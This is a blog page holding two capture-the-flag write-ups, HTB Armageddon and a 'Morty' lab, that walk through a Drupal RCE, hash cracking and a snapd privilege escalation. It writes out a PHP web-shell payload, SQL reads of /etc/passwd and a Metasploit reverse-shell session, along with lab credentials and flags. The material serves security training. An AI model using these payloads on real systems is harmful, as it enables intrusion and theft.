Month: March 2021
Protected: pg-wombo-private
htb-armageddon-nl
Introduction@Armageddon:~$
Column | Details |
---|---|
Name | armageddon |
IP | 10.10.10.233 |
Points | 20 |
Os | Linux |
Difficulty | Easy |
Creator | bertolis |
Out On | 27 Mar 2021 |
Pwned
➜ armageddon git:(master) ✗ ssh root@armageddon.htb root@armageddon.htbWelcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64) System information as of Thu 21 May 2020 06:11:30 AM UTC System load: 0.07 Usage of /: 46.0% of 15.68GB Memory usage: 13% Swap usage: 0% Processes: 218 Users logged in: 2 IPv4 address for br-836575a2ebbb: 172.20.0.1 IPv4 address for br-8ec6dcae5ba1: 172.30.0.1 IPv4 address for docker0: 172.17.0.1 IPv4 address for eth0: 10.10.10.233 Last login: Thu May 21 06:11:12 2020 from 10.10.XX.XX
Recon
Nmap
So basically Two ports are opened 22:ssh
80:http
Port-80
There is a simple login page
.
Let’s check the source code for some juicy
stuff.
I found the drupal version "Drupal 7"
.
Let’s search on google for exploit
for this specific
version.
Found a rapid7
page
Let’s try this real
quick.
We got the shell
.
Now let’s enumerate
some good stuff
.
I found an interesting
file called settings.php
inside /var/www/html/sites/default/
directory. which has contain mysql
creads.
But before connect to the mysql
let’s spawn a stable shell
first.
python3 tty
shell doesn’t spawn So let’s try connect
with mysql without tty shell
.
It’s giving us error
so let’s try another command of mysql
.
It’s work let’s fetch
the tables inside drupal
database.
Now let’s dump the username
and hashes
inside users table.
Now we have the hashes
let’s try to crack
it.
We got the password for brucetherealadmin:booboo
Let’s ssh
in real quick and get the user.txt
.
Privilege escalation
Before running linpeas
let’s try manually
first.
Let’s google it for Privilege
escalation.
Link
: Privilege Escalation in Ubuntu Linux (dirty_sock exploit)
This github python
script doesn’t work in this case so in this script
we only need the base64
string and then we decode the base64 string
and save it in file.
Imp : If you can’t "su dirty_sock"
reset the box and try again
in my case it’s work in second
time.
And we pwned it …….
If u liked the writeup.Support a Student to Get the OSCP-Cert
Donation for OSCP
Resources
Topic | Url |
---|---|
Drupal Drupalgeddon 2 Forms API Property Injection | https://www.rapid7.com/db/modules/exploit/unix/webapp/drupal_drupalgeddon2/ |
Privilege Escalation in Ubuntu Linux (dirty_sock exploit) | https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html |
dirty_sock: Linux Privilege Escalation (via snapd) | https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py |
.
Hash -> OhKUwkvR$.uL.mlYJOz.ubK/FmXouGbU7vCVCG9s00K7R.ny9ryM.vXNdwZhOGCcq7e3XcbA5UpqUp.9eKY4hfLy9m5aU7/
.
Protected: pg-pebbles-private
Protected: pg-twiggy-private
Protected: pg-medjed-private
Protected: pg-hutch-private
Protected: pg-meathead-private
Protected: pg-vector-private
ptd-morty-private
.
┌─[✗]─[user@parrot-virtual]─[~/ptd/morty] └──╼ $cat allports.nmap # Nmap 7.91 scan initiated Fri Mar 5 15:11:41 2021 as: nmap -A -oN allports.nmap 10.150.150.57 Nmap scan report for mortysserver.com (10.150.150.57) Host is up (0.031s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 e8:60:09:66:aa:1f:e8:76:d8:84:16:18:1c:e4:ee:32 (RSA) | 256 92:09:d3:0e:f9:47:48:03:9f:32:9f:0f:17:87:c2:a4 (ECDSA) |_ 256 1d:d1:b3:2b:24:dc:c2:8a:d7:ca:44:39:24:c3:af:3d (ED25519) 53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.16.1-Ubuntu 80/tcp open http Apache httpd 2.4.41 |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Mar 5 15:11:58 2021 -- 1 IP address (1 host up) scanned in 16.41 seconds ┌─[user@parrot-virtual]─[~/ptd/morty]
.
┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $curl http://10.150.150.57/note.html Morty, <br> if you read this: I've already configured your domain 'mortysserver.com' on this server, don't bother me with it anymore!! <br> -Rick ┌─[user@parrot-virtual]─[~/ptd/morty]
.add 10.150.150.57 mortyserver to /etc/hosts
┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $cat secret.txt Fl4sk#! ┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $md5sum screen.jpeg df7eb9983c329c32408c5a6be270b3f1 screen.jpeg ┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $steghide --info screen.jpeg "screen.jpeg": format: jpeg capacity: 10.4 KB Try to get information about embedded data ? (y/n) y Enter passphrase: embedded file "keytotheuniverse.txt": size: 24.0 Byte encrypted: rijndael-128, cbc compressed: yes ┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $steghide extract -sf screen.jpeg Enter passphrase: Fl4sk#! wrote extracted data to "keytotheuniverse.txt". ┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $ls -la total 212 drwxr-xr-x 1 user user 108 Mar 11 11:12 . drwxr-xr-x 1 user user 2164 Mar 5 15:10 .. -rw-r--r-- 1 user user 1016 Mar 5 15:11 allports.nmap -rw-r--r-- 1 user user 24 Mar 11 11:12 keytotheuniverse.txt -rw-r--r-- 1 user user 204432 Mar 8 09:32 screen.jpeg -rw-r--r-- 1 user user 9 Mar 11 11:11 secret.txt ┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $cat keytotheuniverse.txt rick:WubbaLubbaDubDub1!
.
┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $dig axfr @10.150.150.57 ; <<>> DiG 9.16.8-Debian <<>> axfr @10.150.150.57 ; (1 server found) ;; global options: +cmd ;; Query time: 33 msec ;; SERVER: 10.150.150.57#53(10.150.150.57) ;; WHEN: Fri Mar 12 11:46:00 GMT 2021 ;; MSG SIZE rcvd: 56 ┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $dig axfr @10.150.150.57 mortysserver.com ; <<>> DiG 9.16.8-Debian <<>> axfr @10.150.150.57 mortysserver.com ; (1 server found) ;; global options: +cmd mortysserver.com. 900 IN SOA 10.150.150.57. email.mortysserver.com. 1 900 900 604800 900 mortysserver.com. 900 IN NS 10.150.150.57. rickscontrolpanel.mortysserver.com. 900 IN A 10.150.150.57 mortysserver.com. 900 IN SOA 10.150.150.57. email.mortysserver.com. 1 900 900 604800 900 ;; Query time: 29 msec ;; SERVER: 10.150.150.57#53(10.150.150.57) ;; WHEN: Fri Mar 12 11:47:13 GMT 2021 ;; XFR size: 4 records (messages 1, bytes 212) ┌─[user@parrot-virtual]─[~/ptd/morty]
We add to our /etc/hosts : 10.150.150.57 mortysserver.com rickscontrolpanel.mortysserver.com email.mortysserver.com
.
We access http://rickscontrolpanel.mortysserver.com
and find FLAG1=921e4db975bda77543cfe83fbe176d15e09ce7e2
We logon to this phpmyadmin site as rick:WubbaLubbaDubDub1!
and find
FLAG2=e39c995fbf614c5c38ca7343f59cc310e5880251
.
in phpmyadmin create database 1st, then execute query :
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php"
.
we get
Error SQL query: Documentation SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/backdoor.php" MySQL said: Documentation #1 - Can't create/write to file '/var/www/backdoor.php' (Errcode: 13 "Permission denied")
.So we can’t write there ( writing in \tmp is allowed )
.
.
SELECT LOAD_FILE (‘/etc/passwd’);
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin morty:x:1000:1000:Morty Smith:/home/morty:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false bind:x:112:118::/var/cache/bind:/usr/sbin/nologin mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false
wappalyzer shows phpmyadmin = version 4.8.1
We can then use https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e#:~:text=from%20PMA%204.8.-,0%20~%204.8.,PHP%20code%20on%20the%20server
or use metesploit module : multi/http/phpmyadmin_lfi_rce
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > show options Module options (exploit/multi/http/phpmyadmin_lfi_rce): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD WubbaLubbaDubDub1! no Password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.150.150.57 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Base phpMyAdmin directory path USERNAME rick yes Username to authenticate with VHOST rickscontrolpanel.mortysserver.com no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.66.66.42 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 10.66.66.42:4444 msf6 exploit(multi/http/phpmyadmin_lfi_rce) > [*] Sending stage (39282 bytes) to 10.150.150.57 [*] Meterpreter session 1 opened (10.66.66.42:4444 -> 10.150.150.57:42974) at 2021-03-13 14:58:15 +0000 msf6 exploit(multi/http/phpmyadmin_lfi_rce) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter php/linux www-data (33) @ morty 10.66.66.42:4444 -> 10.150.150.57:42974 (10.150.150.57) msf6 exploit(multi/http/phpmyadmin_lfi_rce) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 9802 created. Channel 0 created. cd user/morty cat FLAG3.txt 73ce6cecfc1109f1e43d379fd9922dcc699af321
Later found the i could write to
echo '<?php system($_GET['cmd']); ?>' > shell.php pwd /var/www/html/rickscontrolpanel/public_html/phpmyadmin
and then access
http://rickscontrolpanel.mortysserver.com/shell.php?cmd=whoami
Author : Puckiestyle